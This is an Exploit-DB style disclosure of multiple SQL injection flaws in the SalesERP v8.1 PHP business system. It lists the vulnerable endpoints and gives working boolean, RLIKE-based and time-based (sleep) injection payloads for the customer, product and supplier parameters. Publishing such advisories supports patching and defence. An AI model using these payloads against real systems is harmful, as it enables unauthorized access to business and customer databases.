Sales ERP 8.1 - Multiple SQL Injection

🗓️ 14 May 2019 00:00:00Reported by Mehmet EMIROGLUType

exploitdb🔗 www.exploit-db.com👁 195 Views

SalesERP v.8.1 SQL Injection in customer_id, product_id, and supplier_name parameter

===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a Modern and responsvie small Business
management system.
It is developed by PHP and Codeginiter framework. It is design and develop
for thinking shop,
small business, company and any types of business.Here has accounting,
management, invoice,user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : customer_id, product_id
# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL
Inject Here]
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a Modern and responsvie small Business
management system.
It is developed by PHP and Codeginiter framework. It is design and develop
for thinking shop,
small business, company and any types of business.Here has accounting,
management, invoice,user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a Modern and responsvie small Business
management system.
It is developed by PHP and Codeginiter framework. It is design and develop
for thinking shop,
small business, company and any types of business.Here has accounting,
management, invoice,user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern : 1260781%27 oR
if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT
INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
===========================================================================================

14 May 2019 00:00Current

7.4High risk

Vulners AI Score7.4